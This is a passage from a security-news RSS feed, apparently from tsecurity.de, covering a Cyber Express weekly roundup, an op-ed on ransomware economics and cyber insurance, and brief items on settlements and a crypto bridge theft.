<content:encoded><![CDATA[<p><img width="1201" height="685" src="https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="TCE weekly roundup TCE" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE.webp 1201w, https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE-300x171.webp 300w, https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE-1024x584.webp 1024w, https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE-768x438.webp 768w, https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE-600x342.webp 600w, https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE-150x86.webp 150w, https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE-750x428.webp 750w, https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE-1140x650.webp 1140w, https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE.webp 1201w, https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE-300x171.webp 300w, https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE-1024x584.webp 1024w, https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE-768x438.webp 768w, https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE-600x342.webp 600w, https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE-150x86.webp 150w, https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE-750x428.webp 750w, https://thecyberexpress.com/wp-content/uploads/TCE-weekly-roundup-TCE-1140x650.webp 1140w" sizes="(max-width: 1201px) 100vw, 1201px" title="The Cyber Express Weekly Roundup: AI Threat Escalation, Ransomware Disruption, Supply Chain Attacks, and Expanding Cybersecurity Risks 1"></p><p data-start="0" data-end="471">In this weekly roundup from The Cyber Express, the global cybersecurity landscape in 2026 continues to shift rapidly as emerging technologies and evolving cyber threats reshape the digital environment. Governments are increasing oversight of artificial intelligence and data practices, while ransomware groups, nation-state actors, and cybercriminal networks are refining their tactics to target enterprises, critical infrastructure, and software supply chains.</p>
<p data-start="473" data-end="742" data-is-last-node="" data-is-only-node="">This week’s developments highlight how modern cyber risks are becoming more interconnected across industries, with AI-driven attacks, ransomware operations, privacy concerns, and software supply chain compromises continuing to place pressure on organizations worldwide.</p>

<h3 aria-level="2"><b><span data-contrast="none">The Cyber Express Weekly Roundup</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<h4 aria-level="3"><b><span data-contrast="none">AI Cyberattacks Surge Across the Americas in Early 2026</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":281,"335559739":281}'> </span></h4>
<img src="https://thecyberexpress.com/wp-content/uploads/Americas-cyber-threat-landscape-1024x536.webp" alt="Americas cyber threat landscape">

<span data-contrast="auto">Cyber activity linked to artificial intelligence has intensified across the Americas during Q1 2026, with attackers increasingly leveraging AI-driven tools to scale ransomware campaigns, automate reconnaissance, and enhance <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-social-engineering/" target="_blank" rel="noopener" title="social engineering" data-wpil-keyword-link="linked" data-wpil-monitor-id="28265">social engineering</a> operations. A <a href="https://cyble.com/webinars/from-ai-driven-attacks-to-infrastructure-risk-what-shaped-americas-cyber-threat-landscape-in-q1-2026/" target="_blank" rel="nofollow noopener">scheduled webinar</a> on May 28 by Cyble will bring together security specialists to examine emerging cyber trends, including ransomware evolution, nation-state activity, and defensive strategies to improve cyber resilience. </span><a href="https://thecyberexpress.com/americas-cyber-threat-landscape-cyble-webinar/"><b><span data-contrast="none">Read more...</span></b></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h4 aria-level="3"><b><span data-contrast="none">Foxconn Confirms Cyberattack Amid Ransomware Claims of Massive Data Theft</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":281,"335559739":281}'> </span></h4>
<span data-contrast="auto">Manufacturing giant Foxconn confirmed a <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-a-cyber-attack/" target="_blank" rel="noopener" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="28261">cyberattack</a> that disrupted operations at several North American facilities following claims from the Nitrogen ransomware group. The attackers alleged they had stolen more than 8TB of corporate <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28262">data</a>, including over 11 million files. Foxconn activated <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-incident-response/" target="_blank" rel="noopener" title="incident response" data-wpil-keyword-link="linked" data-wpil-monitor-id="28260">incident response</a> procedures and stated that operations were gradually returning to normal. </span><a href="https://thecyberexpress.com/foxconn-cyberattack/"><b><span data-contrast="none">Read more...</span></b></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h4 aria-level="3"><b><span data-contrast="none">Microsoft Patches 120 Vulnerabilities in May 2026 Security Update</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":281,"335559739":281}'> </span></h4>
<span data-contrast="auto">In its May 2026 Patch Tuesday release, Microsoft addressed approximately 120 security <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="28264">vulnerabilities</a> across a wide range of products, including Windows, Office, SharePoint, DNS services, and enterprise platforms. Among these were 17 classified as critical severity issues. Although no actively exploited zero-day vulnerabilities were reported in this cycle, multiple high-risk remote code execution flaws prompted security researchers to recommend immediate patch deployment across enterprise environments. </span><a href="https://thecyberexpress.com/microsoft-may-2026-patch-tuesday/"><b><span data-contrast="none">Read more...</span></b></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h4><b><span data-contrast="none">California Issues Record $12.75 Million Privacy Settlement Against GM</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":281,"335559739":281}'> </span></h4>
<span data-contrast="auto">California regulators reached a $12.75 million settlement with <a class="wpil_keyword_link" href="https://cyble.com/general/" target="_blank" rel="noopener" title="General" data-wpil-keyword-link="linked" data-wpil-monitor-id="28263">General</a> Motors over allegations tied to violations of the California Consumer Privacy Act (CCPA). Authorities claimed the company collected, retained, and sold driver data without proper consent. The investigation alleged that General Motors shared sensitive geolocation and driving behavior data from its OnStar platform with data brokers LexisNexis and Verisk between 2020 and 2024. </span><a href="https://thecyberexpress.com/california-privacy-settlement-hits-gm/"><b><span data-contrast="none">Read more...</span></b></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h4 aria-level="3"><b><span data-contrast="none">Malicious npm Packages Fuel JavaScript Supply Chain Attack</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":281,"335559739":281}'> </span></h4>
<span data-contrast="auto">Security researchers have identified a supply chain compromise targeting the widely used node-ipc npm package ecosystem. Several versions—including 9.1.6, 9.2.3, and 12.0.1—were found to contain malicious code designed to act as a credential-stealing backdoor. The compromised packages reportedly collected sensitive system information, developer credentials, and CI/CD pipeline secrets from affected environments. </span><a href="https://thecyberexpress.com/node-ipc-npm-package-credential-stealer/"><b><span data-contrast="none">Read more...</span></b></a><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Weekly cybersecurity takeaway</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">This week’s <strong><a href="https://thecyberexpress.com/" target="_blank" rel="noopener">The Cyber Express</a></strong> weekly roundup highlights how modern cybersecurity threats are increasingly interconnected across technology, regulation, and supply chains. AI-driven attacks are expanding operational scale; <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-ransomware/" target="_blank" rel="noopener" title="ransomware" data-wpil-keyword-link="linked" data-wpil-monitor-id="28267">ransomware</a> groups continue to rely on data theft and disruption, and software supply chain compromises are increasingly targeting developer ecosystems.</span>

<span data-contrast="auto">At the same time, regulatory and legal responses, from privacy settlements to <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="28259">vulnerability</a> patch cycles, continue to evolve in parallel. The overall landscape suggests that cyber <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-risks-in-cybersecurity/" title="risk" data-wpil-keyword-link="linked" data-wpil-monitor-id="28266">risk</a> in 2026 is no longer confined to individual incidents but is instead shaped by continuous pressure across infrastructure, software, and data governance layers.</span>]]></content:encoded>
</item>
<item>
<title><![CDATA[The economics of ransomware 3.0]]></title>
<description><![CDATA[The moment every boardroom dreads



There is a moment in almost every ransomware negotiation — usually around 36 hours, when legal, IT and the CFO are all in the same room — when someone says it out loud: “Let’s just see what the insurance covers.” That instinct, understandable as it is, has bec...]]></description>
<link>https://tsecurity.de/de/3519081/it-security-nachrichten/the-economics-of-ransomware-30/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3519081/it-security-nachrichten/the-economics-of-ransomware-30/</guid>
<pubDate>Fri, 15 May 2026 11:23:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading">The moment every boardroom dreads</h2>



<p>There is a moment in almost every ransomware negotiation — usually around 36 hours, when legal, IT and the CFO are all in the same room — when someone says it out loud: “Let’s just see what the insurance covers.” That instinct, understandable as it is, has become one of the most expensive assumptions in modern business. The threat landscape has moved on.</p>



<p>The insurance market is moving on with it. And the organizations still treating cyber insurance as their primary recovery strategy are flying into a storm with a beach umbrella.</p>



<h2 class="wp-block-heading"><a></a>How ransomware became a business</h2>



<p>Criminal groups don’t think in generations — they follow the money. Early campaigns were blunt instruments: Mass phishing, opportunistic encryption and hope that enough victims panic-pay. Groups like REvil and Conti figured out that one well-researched enterprise target was worth more than ten thousand spray-and-pray attempts. Ransom demands climbed from hundreds of dollars to tens of millions.</p>



<p>What you’re dealing with now is categorically different from both predecessors. Ransomware 3.0 isn’t primarily about encryption. That’s just the opening move. The real play is owning your leverage — over your operations, your data, your customers and your regulators — simultaneously.</p>



<p><a href="https://www.verizon.com/business/resources/reports/dbir/">Verizon’s 2024 Data Breach Investigations Report</a> documented ransomware or extortion as a factor in 32% of all breaches, with organized criminal groups accounting for most incidents.</p>



<h2 class="wp-block-heading"><a></a>Triple extortion: The mechanics of maximum pressure</h2>



<p>Most organisations mentally prepare for one thing when they hear “ransomware” — locked systems, a ransom note, a recovery decision. That framing is now dangerously out of date.</p>



<p>What groups like ALPHV (BlackCat) and Cl0p deploy is a three-layer pressure campaign. Encryption hits first — operations locked, revenue stopped. Then comes exfiltration: Your data was already removed before the encryptor ran, and that threat doesn’t expire when you restore from backup. The third layer is the one most organisations are least prepared for — direct contact with your customers, regulators and shareholders, timed to maximise pressure at the worst possible moment.</p>



<p>They don’t just threaten to follow through. They follow through.</p>



<p>The economic logic here is sound, from the attacker’s perspective. A good backup strategy can defeat encryption alone. Exfiltration cannot. Once your customer records, intellectual property or board communications are in the hands of a criminal group, no backup restores that situation. You are no longer dealing with a technology problem.</p>



<p><a href="https://www.coveware.com/ransomware-quarterly-reports">Coveware’s ransomware analysis for Q4 2024</a> consistently shows that data exfiltration now occurs in most enterprise ransomware cases, fundamentally altering the negotiation and recovery calculus.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="586" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Triple extortion mechanism.</figcaption></figure><p class="imageCredit">Ashish Mishra</p></div>



<h2 class="wp-block-heading"><a></a>What the Change Healthcare case tells you about real costs</h2>



<p>Consider what happened to Change Healthcare in early 2024. The ALPHV group’s attack on this healthcare payments processor didn’t just encrypt systems — it exposed the personal health information of potentially over 100 million Americans and disrupted pharmacy services across the country for weeks. Parent company UnitedHealth Group reportedly paid approximately $22 million in ransom. The total financial impact, including operational disruption, remediation and ongoing legal exposure, came to approximately $3.09 billion for 2024 alone. Insurance covered a fraction of it.</p>



<p>HHS Office for Civil Rights confirmed it formally opened an investigation into Change Healthcare and UnitedHealth Group, focused on whether protected health information was breached and whether HIPAA Rules were complied with — citing the attack’s unprecedented impact on patient care and privacy.</p>



<p>The numbers from Change Healthcare are worth sitting with, because they reframe the entire insurance conversation in a single case study. In February 2024, the ALPHV group walked into this healthcare payments processor through an unprotected Citrix portal and spent weeks moving through the network before anyone noticed. By the time the encryptor ran, the damage was already done — over 100 million Americans had their personal health information exposed, pharmacy services across the country ground to a halt, and UnitedHealth Group found itself paying approximately $22 million in ransom to a group that took the money and disappeared without delivering the promised decryptor.</p>



<p><a href="https://www.sec.gov/Archives/edgar/data/731766/000073176625000022/a2024q4exhibit991.htm">The total bill for 2024 came to approximately $3.09 billion.</a> That figure covers operational disruption, remediation, provider support and ongoing legal exposure. The insurance programme covered a fraction of it — and that fraction came after a fight, not automatically.</p>



<p>HHS Office for Civil Rights didn’t wait for the dust to settle. They opened a <a href="https://www.hhs.gov/about/news/2024/03/13/hhs-office-civil-rights-issues-letter-opens-investigation-change-healthcare-cyberattack.html">formal investigation</a> into whether UnitedHealth Group had complied with HIPAA Rules and whether patient privacy protections had held up, framing it publicly as the largest breach of healthcare data in American history. That regulatory pressure didn’t arrive weeks later. It arrived while the organisation was still in active recovery.</p>



<h2 class="wp-block-heading"><a></a>Why your insurance policy is not the safety net you think it is</h2>



<p>That example points directly to the insurance problem. Cyber insurance was priced and structured for a different threat model. Carriers increasingly include sub-limits for ransomware events, exclusions for nation-state attribution (a category that is deliberately difficult to disprove when it suits an insurer), and requirements around security controls that many policyholders have never actually verified they meet. After a major incident, you may discover that your $10 million policy has a $2 million ransomware sublimit — and that a coverage dispute will run in parallel with your breach response for the next 18 months.</p>



<p>This isn’t theoretical. Merck’s legal battle with insurers after the 2017 NotPetya attack — which attackers attributed to Russian state actors — dragged through the courts for years before a settlement. <a href="https://www.insurancejournal.com/news/national/2024/01/05/754582.htm">Merck settled with remaining insurers in January 2024</a> — just days before New Jersey Supreme Court oral arguments — after the appellate court ruled that the hostile/warlike action exclusion did not apply to the NotPetya cyberattack on a non-combatant firm.</p>



<p>On another side, Lloyd’s of London subsequently mandated that all standalone cyber policies must exclude losses arising from state-backed cyber operations, effective March 2023. The market is not moving in favour of policyholders.</p>



<p><a href="https://assets.lloyds.com/media/35926dc8-c885-497b-aed8-6d2f87c1415d/Y5381%20Market%20Bulletin%20-%20Cyber-attack%20exclusions.pdf">Lloyd’s of London’s Market Bulletin Y5381</a>, published in August 2022, required all standalone cyber policies to exclude losses arising from state-backed cyber operations, effective from 31 March 2023 — in direct response to coverage disputes arising from state-attributed attacks.</p>



<p>None of this means you shouldn’t carry cyber insurance. You should. But the mental model must change. Insurance is a financial transfer mechanism for residual risk — the risk that remains after you’ve built meaningful defences. <a></a></p>



<h2 class="wp-block-heading">What a mature incident response architecture looks like</h2>



<p>What contains a triple extortion event is a mature incident response architecture. That means several things working in concert: Network segmentation that limits an attacker’s lateral movement after initial access; endpoint detection and response tooling that can identify suspicious behaviour before encryption begins; an offline or immutable backup strategy that survives even a sophisticated attacker who has spent weeks inside your environment; and a rehearsed response capability that doesn’t require you to learn the playbook during the incident itself.</p>



<p>The “rehearsed” part is where most organisations fall short. Tabletop exercises are valuable, but they rarely simulate the full chaos of a real event — the communication blackouts, the pressure from the CEO’s office, the media calls starting before you’ve even confirmed the scope.</p>



<p>MGM Resorts’ 2023 ransomware attack, attributed to Scattered Spider, demonstrated what happens when the human layer fails, even if the technology layer is adequate. Social engineering of the IT help desk gave attackers initial access. The subsequent disruption cost the company an estimated <a href="https://www.sec.gov/cgi-bin/browse-edgar?action=getcompany&amp;CIK=MGM&amp;type=8-K">$100 million in lost revenue</a> and remediation costs in a single month.</p>



<p><strong>Guidance:</strong> <a href="https://www.nist.gov/cyberframework">NIST’s Cybersecurity Framework 2.0</a> provides the most widely adopted reference architecture for incident response capability maturity, covering identification, protection, detection, response and recovery functions.</p>



<h2 class="wp-block-heading"><a></a>The only bet that pays off in both scenarios</h2>



<p>The uncomfortable truth your board needs to hear is this: The question is no longer whether your organisation will face a sophisticated threat actor. For any organisation of meaningful size, operating in a connected supply chain, with digital customer relationships, the question is how well-prepared you are when it happens. The economics of ransomware as a criminal enterprise have never been stronger. Attack-as-a-service platforms have lowered the barrier to entry. Ransom payment data is analysed and used to calibrate future demands. These groups study your financial filings.</p>



<p>Investing in incident response capability — in people, process and technology — is not a cost centre decision. It’s the only bet that pays off in both the prevention scenario and the response scenario. Insurance pays out after the damage is done. A mature response architecture reduces the damage itself.</p>



<p>The organisations that navigated the <a href="https://www.emsisoft.com/en/blog/44123/the-moveit-hack-victim-list/">Cl0p MOVEit campaign of 2023</a> with the least disruption weren’t the ones with the biggest insurance policies. They were the ones who had mapped their data flows, limited unnecessary MOVEit exposure and had a response team that could move within hours rather than days.</p>



<p>That’s the standard you’re competing against now.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Unofficial Notepad++ Mac Port Renames To Nextpad++ After Dispute]]></title>
<description><![CDATA[The developer behind the popular unofficial Mac port of the Windows text editor Notepad++ recently announced a major name change. Following a trademark dispute with the original creator of the software, the application is now officially called Nextpad. This rebranding aims to settle the disagreem...]]></description>
<link>https://tsecurity.de/de/3516698/ios-mac-os/unofficial-notepad-mac-port-renames-to-nextpad-after-dispute/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3516698/ios-mac-os/unofficial-notepad-mac-port-renames-to-nextpad-after-dispute/</guid>
<pubDate>Thu, 14 May 2026 14:24:34 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The developer behind the popular unofficial Mac port of the Windows text editor Notepad++ recently announced a major name change. Following a trademark dispute with the original creator of the software, the application is now officially called Nextpad. This rebranding aims to settle the disagreements over the naming rights while allowing the project to continue offering its helpful coding tools to users.



The developer settles the trademark dispute by choosing a new name



The original Notepad++ is a very popular coding tool for Windows. When a creator made a version that works on Apple computers, that person used the same name to attract users who were already familiar with the software. This decision quickly led to a trademark disagreement with the official Notepad++ team.



To resolve the issue and avoid legal trouble, the creator of the Mac port agreed to change the title completely. The software is now called Nextpad. People can visit the new website to see the updated branding and move past the conflict.



The software keeps all its current features despite the sudden rebranding



Even though the application has a different title, it still offers the same features that users rely on. People who download Nextpad will find the familiar interface and coding tools they enjoyed in the previous version. The developer simply swapped out the logo and the text across the app to comply with the settlement.



Current users do not need to worry about losing their settings or current projects. The update that brings the new name installs over the old version smoothly. It ensures that everyone can get back to their work without any interruptions or missing files.



The quick resolution allows the project to stay active without facing a heavy legal battle. Changing the name clears up any confusion with the original Windows software and gives the port its own clear identity moving forward.]]></content:encoded>
</item>
<item>
<title><![CDATA[US Judge Challenges SEC, Musk Over Twitter Settlement]]></title>
<description><![CDATA[Federal judge says settlement presents string of ‘red flags’, asking them to explain why it appears crafted to avoid personally penalising Musk This article has been indexed from Silicon UK Read the original article: US Judge Challenges SEC, Musk Over…
Read more →
The post US Judge Challenges SEC...]]></description>
<link>https://tsecurity.de/de/3516297/it-security-nachrichten/us-judge-challenges-sec-musk-over-twitter-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3516297/it-security-nachrichten/us-judge-challenges-sec-musk-over-twitter-settlement/</guid>
<pubDate>Thu, 14 May 2026 12:06:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Federal judge says settlement presents string of ‘red flags’, asking them to explain why it appears crafted to avoid personally penalising Musk This article has been indexed from Silicon UK Read the original article: US Judge Challenges SEC, Musk Over…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/us-judge-challenges-sec-musk-over-twitter-settlement/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/us-judge-challenges-sec-musk-over-twitter-settlement/">US Judge Challenges SEC, Musk Over Twitter Settlement</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-05-14 12h : 17 posts]]></title>
<description><![CDATA[17 posts were published in the last hour 10:3 : US Judge Challenges SEC, Musk Over Twitter Settlement 10:3 : Lyrie.ai Unveils Open Standard for Agent Security and Joins Anthropic’s Cyber Verification Program 10:2 : Amazon Quick Security Flaw Allowed…
Read more →
The post IT Security News Hourly S...]]></description>
<link>https://tsecurity.de/de/3516296/it-security-nachrichten/it-security-news-hourly-summary-2026-05-14-12h-17-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3516296/it-security-nachrichten/it-security-news-hourly-summary-2026-05-14-12h-17-posts/</guid>
<pubDate>Thu, 14 May 2026 12:06:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>17 posts were published in the last hour 10:3 : US Judge Challenges SEC, Musk Over Twitter Settlement 10:3 : Lyrie.ai Unveils Open Standard for Agent Security and Joins Anthropic’s Cyber Verification Program 10:2 : Amazon Quick Security Flaw Allowed…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-05-14-12h-17-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-05-14-12h-17-posts/">IT Security News Hourly Summary 2026-05-14 12h : 17 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacker saugen über 3 Millionen Dollar von der TAC-Protokoll-Cross-Chain-Brücke ... - EGW.News]]></title>
<description><![CDATA[Der Hacker überbrückte die USDT zu Ethereum, tauschte sie gegen ETH und wandelte sie dann in DAI (einen einfriersicheren Stablecoin) um. Hackers ...]]></description>
<link>https://tsecurity.de/de/3515087/hacking/hacker-saugen-ueber-3-millionen-dollar-von-der-tac-protokoll-cross-chain-bruecke-egwnews/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3515087/hacking/hacker-saugen-ueber-3-millionen-dollar-von-der-tac-protokoll-cross-chain-bruecke-egwnews/</guid>
<pubDate>Wed, 13 May 2026 23:35:26 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der <b>Hacker</b> überbrückte die USDT zu Ethereum, tauschte sie gegen ETH und wandelte sie dann in DAI (einen einfriersicheren Stablecoin) um. <b>Hackers</b> ...]]></content:encoded>
</item>
<item>
<title><![CDATA[JPMorgan Plans to Launch Tokenised Money Market Fund on Ethereum for Stablecoin Issuers]]></title>
<description><![CDATA[JPMorgan plans to launch the OnChain Liquidity-Token Money Market Fund on Ethereum for stablecoin issuers. The fund, managed by Kinexys Digital Assets, will invest in Treasury bills and overnight repurchase agreements secured by US Treasurys or cash.]]></description>
<link>https://tsecurity.de/de/3513372/it-nachrichten/jpmorgan-plans-to-launch-tokenised-money-market-fund-on-ethereum-for-stablecoin-issuers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3513372/it-nachrichten/jpmorgan-plans-to-launch-tokenised-money-market-fund-on-ethereum-for-stablecoin-issuers/</guid>
<pubDate>Wed, 13 May 2026 12:46:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[JPMorgan plans to launch the OnChain Liquidity-Token Money Market Fund on Ethereum for stablecoin issuers. The fund, managed by Kinexys Digital Assets, will invest in Treasury bills and overnight repurchase agreements secured by US Treasurys or cash.]]></content:encoded>
</item>
<item>
<title><![CDATA[DOJ extracts $30m settlement from PayPal over minority-owned business program]]></title>
<description><![CDATA[The federal retaliation against corporate DEI efforts marches on.]]></description>
<link>https://tsecurity.de/de/3511945/it-nachrichten/doj-extracts-30m-settlement-from-paypal-over-minority-owned-business-program/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3511945/it-nachrichten/doj-extracts-30m-settlement-from-paypal-over-minority-owned-business-program/</guid>
<pubDate>Tue, 12 May 2026 23:18:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The federal retaliation against corporate DEI efforts marches on.]]></content:encoded>
</item>
<item>
<title><![CDATA[PlayStation gamers could get a share of $8 million in a class action settlement — here’s how to know if you’re eligible, and why you shouldn’t expect a big payout]]></title>
<description><![CDATA[Sony is paying out a share of almost $8 million to PlayStation owners in the US as part of a settlement.]]></description>
<link>https://tsecurity.de/de/3511510/it-nachrichten/playstation-gamers-could-get-a-share-of-8-million-in-a-class-action-settlement-heres-how-to-know-if-youre-eligible-and-why-you-shouldnt-expect-a-big-payout/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3511510/it-nachrichten/playstation-gamers-could-get-a-share-of-8-million-in-a-class-action-settlement-heres-how-to-know-if-youre-eligible-and-why-you-shouldnt-expect-a-big-payout/</guid>
<pubDate>Tue, 12 May 2026 20:01:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sony is paying out a share of almost $8 million to PlayStation owners in the US as part of a settlement.]]></content:encoded>
</item>
<item>
<title><![CDATA[Xfinity Customer? You May Be Owed Money From a $117.5 Million Data Breach Settlement]]></title>
<description><![CDATA[The $117.5 million Xfinity settlement is open for claims. Here's how to file before the August 14 deadline.]]></description>
<link>https://tsecurity.de/de/3510928/it-nachrichten/xfinity-customer-you-may-be-owed-money-from-a-1175-million-data-breach-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3510928/it-nachrichten/xfinity-customer-you-may-be-owed-money-from-a-1175-million-data-breach-settlement/</guid>
<pubDate>Tue, 12 May 2026 17:47:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The $117.5 million Xfinity settlement is open for claims. Here's how to file before the August 14 deadline.]]></content:encoded>
</item>
<item>
<title><![CDATA[Cyber Briefing: 2026.05.12]]></title>
<description><![CDATA[The “Mini Shai-Hulud” supply chain attack and critical SAP vulnerabilities represent high-impact systemic risks, while the record GM settlement and the formation of the ACI signal a shift toward… This article has been indexed from CyberMaterial Read the original article:…
Read more →
The post Cyb...]]></description>
<link>https://tsecurity.de/de/3510665/it-security-nachrichten/cyber-briefing-20260512/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3510665/it-security-nachrichten/cyber-briefing-20260512/</guid>
<pubDate>Tue, 12 May 2026 16:41:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The “Mini Shai-Hulud” supply chain attack and critical SAP vulnerabilities represent high-impact systemic risks, while the record GM settlement and the formation of the ACI signal a shift toward… This article has been indexed from CyberMaterial Read the original article:…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/cyber-briefing-2026-05-12/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/cyber-briefing-2026-05-12/">Cyber Briefing: 2026.05.12</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to check whether your iPhone qualifies for Apple Intelligence settlement money]]></title>
<description><![CDATA[As of May 12, the claims process for Apple's proposed Siri settlement over delayed Apple Intelligence features has not opened yet. Here's what you need to know about the process, what to watch out for, and how to check eligibility.iPhone 16 and iPhone 16 Pro both qualify for delayed Apple Intelli...]]></description>
<link>https://tsecurity.de/de/3510634/ios-mac-os/how-to-check-whether-your-iphone-qualifies-for-apple-intelligence-settlement-money/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3510634/ios-mac-os/how-to-check-whether-your-iphone-qualifies-for-apple-intelligence-settlement-money/</guid>
<pubDate>Tue, 12 May 2026 16:25:59 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
